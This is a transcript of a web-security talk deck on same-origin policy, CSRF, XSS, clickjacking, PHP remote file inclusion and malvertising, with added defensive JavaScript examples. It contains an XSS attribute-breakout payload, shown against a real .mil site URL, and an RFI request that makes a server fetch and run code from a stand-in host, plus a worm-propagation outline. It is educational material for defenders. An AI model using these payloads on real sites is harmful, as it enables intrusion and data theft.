Web 2.0 Threats Illustrated
Transcript of a slide deck by Robert Hansen (source: cdn.ttgtmedia.com)
About Me
Robert Hansen - CEO, SecTheory Ltd
• Bespoke boutique Internet security
• Web application/browser security
• Network/OS security
• http://www.sectheory.com/
FallingRock Networks
• Advisory capacity to start-ups
Founded the web application security lab
• http://ha.ckers.org/ - the lab
• http://sla.ckers.org/ - the forum
Primer on Same Origin Policy
Outcomes are relative to a page loaded from http://www.yoursite.com/.

| URL | Outcome | Reason |
|---|---|---|
| http://www.yoursite.com/dir/page.html | Success | Same domain |
| http://www.yoursite.com/dir2/other-page.html | Success | Same domain |
| https://www.yoursite.com/ | Failure (except cookies) | Different protocol |
| http://www.yoursite.com:8080/ | Failure (except cookies) | Different port |
| http://news.yoursite.com/blog/ | Failure (except cookies) | Different host |
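The table above, as an added example that is not part of the original deck: an origin comparison the way browsers apply it to script access (scheme, host and port, with default ports normalised), next to the cookie-scope rule that explains the "except cookies" column. The yoursite.com URLs are the slide's own placeholders; the cookie Domain attribute used for the subdomain case is an assumption.

```javascript
// Added example: Same-Origin Policy check as browsers apply it to script access.
// An origin is the (scheme, host, port) triple; default ports are normalised so that
// http://host/ and http://host:80/ compare equal. Cookies are the exception the table
// notes: their scope is host (and path), not scheme or port.
// URLs are the slide's placeholders (yoursite.com); the cookie Domain is an assumption.

const DEFAULT_PORTS = { 'http:': '80', 'https:': '443' };

function origin(urlString) {
  const u = new URL(urlString);
  const port = u.port || DEFAULT_PORTS[u.protocol] || '';
  return `${u.protocol}//${u.hostname}:${port}`;
}

function sameOrigin(a, b) {
  return origin(a) === origin(b);
}

// Cookie scope ignores scheme and port. A host-only cookie needs an exact host match;
// a cookie set with Domain=yoursite.com also reaches subdomains such as news.yoursite.com,
// which is why the slide marks the different-host row "except cookies".
function shareCookies(a, b, cookieDomain = null) {
  const ha = new URL(a).hostname;
  const hb = new URL(b).hostname;
  if (cookieDomain) {
    const inDomain = h => h === cookieDomain || h.endsWith('.' + cookieDomain);
    return inDomain(ha) && inDomain(hb);
  }
  return ha === hb;
}

const BASE = 'http://www.yoursite.com/dir/page.html';
const CASES = [
  'http://www.yoursite.com/dir2/other-page.html',
  'https://www.yoursite.com/',
  'http://www.yoursite.com:8080/',
  'http://news.yoursite.com/blog/',
];

// Reproduces the slide's table plus the cookie column for each row.
function classify(base, urls, cookieDomain) {
  return urls.map(u => ({
    url: u,
    sameOrigin: sameOrigin(base, u),
    cookiesShared: shareCookies(base, u, cookieDomain),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(classify(BASE, CASES, 'yoursite.com'));
}
```

Run it with `node` to print the table. Note that `shareCookies` without a Domain argument models a host-only cookie, so the news.yoursite.com row only shares cookies when the site explicitly widened the cookie's Domain.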
CSRF
• Cross-domain image/iframe/CSS/JS calls, etc.
• Malicious and benign cross-domain requests are almost impossible to tell apart.
• GET and POST are equally vulnerable.
• Affects nearly all websites
  – banks, .gov, etc.
CSRF Mitigation
• Check referrer
  – Attacker can turn the referrer off: meta refresh, https, or JS
• Use a nonce (e.g. <input type="hidden" name="nonce" value="5jjkhu431ju1i8d9r14">)
  – Attacker can make the user click on it for them, or steal it
• Embed the link in a flash movie
XSS
• <input name="a" value="$var">
• $var = '"><script>alert("XSS")</script>';
• Result: <input name="a" value=""><script>alert("XSS")</script>">
• http://radhealth.usuhs.mil/medpix/medpix_cow.html?pt_id="><script>alert("XSS")</script>
• 80% of sites are vulnerable (obfuscation)
• Overwrite pages, steal cookies
• Samy worm: 1MM++
• IE XSS filter / NoScript, et al.
• Helpful for affiliate cookies, phishing, etc.
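The attribute-breakout case from the slide, as an added example that is not the deck's code: the same `<input>` template rendered once with raw interpolation (the slide's vulnerable form) and once with the value encoded for a double-quoted attribute context, plus a crude check that counts how many tags the markup ends up containing. The payload is the slide's `$var`.

```javascript
// Added example (not from the slides): the slide's attribute injection, vulnerable and hardened.
// renderVulnerable() reproduces <input name="a" value="$var"> with no encoding;
// renderSafe() encodes the characters that can close an attribute or open a tag.
// PAYLOAD is the slide's $var.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode for an HTML attribute or text context. Quotes are included because the
// injection point here is inside a double-quoted attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}

// Deliberately vulnerable, as on the slide: untrusted value dropped straight into markup.
function renderVulnerable(v) {
  return `<input name="a" value="${v}">`;
}

// Hardened: identical template, value encoded for the attribute context it lands in.
function renderSafe(v) {
  return `<input name="a" value="${escapeHtml(v)}">`;
}

// Does the rendered markup contain any tag beyond the single <input> we emitted?
function breaksOut(html) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.length !== 1;
}

const PAYLOAD = '"><script>alert("XSS")</script>';   // the slide's $var

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable:', renderVulnerable(PAYLOAD), '->', breaksOut(renderVulnerable(PAYLOAD)));
  console.log('safe:      ', renderSafe(PAYLOAD), '->', breaksOut(renderSafe(PAYLOAD)));
}
```

The encoding is context-specific: the same value placed inside a `<script>` block or a URL would need a different encoder, which is the usual reason filter-based defences like the ones the slide names get bypassed.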
XSS + CSRF
• http://ha.ckers.org/xss.html
Clickjacking 101
• Ronald's Flash settings manager subversion...
• PDP's version...
Examples (one slide each):
• Delete user accounts
• Auto-purchase
• Buy stocks
• Router reset
• Delete firewall rules
• Make your profile public
• Deactivate WordPress plugins
• Digg
• MySpace
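Every example above depends on the target page being loadable inside an attacker-controlled frame. As an added example that is not part of the deck, this checks whether a response's headers permit that: it evaluates X-Frame-Options and the Content-Security-Policy frame-ancestors directive (CSP takes precedence when both are present). The header values and origins are constructed samples; frame-ancestors source matching is simplified to exact origins.

```javascript
// Added example (not from the slides): can `framerOrigin` embed a response with these headers?
// Clickjacking needs the answer to be "yes". CSP frame-ancestors wins over X-Frame-Options
// when both are present; with neither, any site may frame the page.
// Sample headers/origins are constructed; host-source wildcards are not modelled.

function parseCsp(value) {
  const directives = {};
  for (const part of value.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

function framingAllowed(headers, framerOrigin, selfOrigin) {
  // Header names are case-insensitive.
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));

  const csp = h['content-security-policy'] ? parseCsp(h['content-security-policy']) : null;
  if (csp && csp['frame-ancestors']) {
    const sources = csp['frame-ancestors'].map(s => s.replace(/^'|'$/g, '').toLowerCase());
    if (sources.includes('none')) return false;
    if (sources.includes('*')) return true;
    return sources.some(s => (s === 'self' && framerOrigin === selfOrigin) || s === framerOrigin);
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framerOrigin === selfOrigin;
  // No policy, or a value we do not model (the obsolete ALLOW-FROM): treated as no policy.
  return true;
}

// Constructed sample: the state-changing pages from the slides would want the first policy, not the last.
const SAMPLE_RESPONSES = {
  denied:      { 'X-Frame-Options': 'DENY' },
  sameOrigin:  { 'X-Frame-Options': 'SAMEORIGIN' },
  cspNone:     { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'", 'X-Frame-Options': 'SAMEORIGIN' },
  cspPartner:  { 'Content-Security-Policy': "frame-ancestors 'self' https://partner.example" },
  unprotected: { 'Content-Type': 'text/html' },
};

function clickjackable(responses, attackerOrigin, selfOrigin) {
  return Object.entries(responses)
    .filter(([, headers]) => framingAllowed(headers, attackerOrigin, selfOrigin))
    .map(([name]) => name);
}
```

`clickjackable(SAMPLE_RESPONSES, 'http://evil.example', 'http://www.yoursite.com')` returns only the names of responses an attacker's page could frame, which is the list a reviewer wants to see empty for any page with buttons like those above.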
Google Bowling to the Extreme
• Slowloris...
• DNS cache poisoning is fixed... or is it?
• Spoof static.competitor.com and include malware
• Persistent XSS
PHP File Includes
• Robot requests a page:
  http://www.whatever.com/index.php?url=http://www.hacked-site.com/file.txt
• The page fetches the file from www.hacked-site.com, which contains a simple echo statement.
• If the site is vulnerable, it executes the content.
• If the robot sees the echoed statement in the response, it requests the page again with the real payload at www.hacked-site.com/realpayload.txt.
• The site executes the new payload and the bot propagates.
• Simple to turn into a worm...
• Modify some 404s instead of the entire site.
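The probe-then-payload sequence above leaves a distinctive trace in web server logs: a PHP page called with a query parameter whose value is itself an absolute URL. As an added example that is not the deck's code, this parses Apache combined-format access-log lines and flags that pattern, including the percent-encoded form. The log lines are constructed samples and reuse the slide's placeholder hostnames.

```javascript
// Added example (not from the slides): detect RFI probes of the kind the slide describes
// (?url=http://www.hacked-site.com/file.txt) in Apache combined-format access logs.
// Log lines are constructed; hostnames are the slide's placeholders.

const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/;
const REMOTE_URL_RE = /^(?:https?|ftp):\/\//i;

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]), ua: m[6] };
}

// Parameters whose value points at a remote host. URLSearchParams decodes one layer of
// percent-encoding; the extra decode catches double-encoded probes and is a no-op otherwise.
function remoteIncludeParams(requestPath) {
  const u = new URL(requestPath, 'http://placeholder.invalid');   // base only so the query parses
  const hits = [];
  for (const [k, v] of u.searchParams) {
    let val = v;
    try { val = decodeURIComponent(v); } catch { /* malformed encoding: keep raw value */ }
    if (REMOTE_URL_RE.test(val)) hits.push({ param: k, target: val });
  }
  return hits;
}

function findRfiProbes(lines) {
  const probes = [];
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    const hits = remoteIncludeParams(rec.path);
    if (hits.length) probes.push({ ip: rec.ip, status: rec.status, ua: rec.ua, ...hits[0] });
  }
  return probes;
}

// Constructed sample traffic: a benign local include, the echo probe, then the real payload.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2009:13:55:36 -0700] "GET /index.php?url=about.php HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
  '198.51.100.23 - - [10/Oct/2009:13:55:40 -0700] "GET /index.php?url=http://www.hacked-site.com/file.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.8"',
  '198.51.100.23 - - [10/Oct/2009:13:55:41 -0700] "GET /index.php?url=http%3A%2F%2Fwww.hacked-site.com%2Frealpayload.txt HTTP/1.1" 200 4096 "-" "libwww-perl/5.8"',
];

if (typeof require !== 'undefined' && require.main === module) {
  console.table(findRfiProbes(SAMPLE_LOG));
}
```

A 200 on the probe followed seconds later by a second remote include from the same source is the success signal the bot itself is looking for, so two hits from one IP against one script is worth treating as a likely compromise rather than a scan.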
SEO via PHP RFI
Malvertising
• Sell ads on behalf of name-brand companies
• Time of day
• Geo IP
• Redirect to malware, or offer malware for sale under the guise of security software
Future of Spamming
Personas:
• Age
• Demographic
• Marital status
• Interests
• Zodiac
• Birth date
• Friends
• Perfect weather
• Locale
• Etc...
Clouds of Insecurity
• DoS, failure to segment data, access controls, going out of business... etc.
Lots Of Other Stuff
• Inter-protocol exploitation
• SQL injection
• History stealing
• DNS rebinding
• RFC1918 cache poisoning
• Etc.
Thank you!
• Robert Hansen
• http://www.sectheory.com – the company
• http://ha.ckers.org – the lab
• http://sla.ckers.org – the forum
• Detecting Malice – the eBook
• XSS Exploits – the book
• [email protected] – the email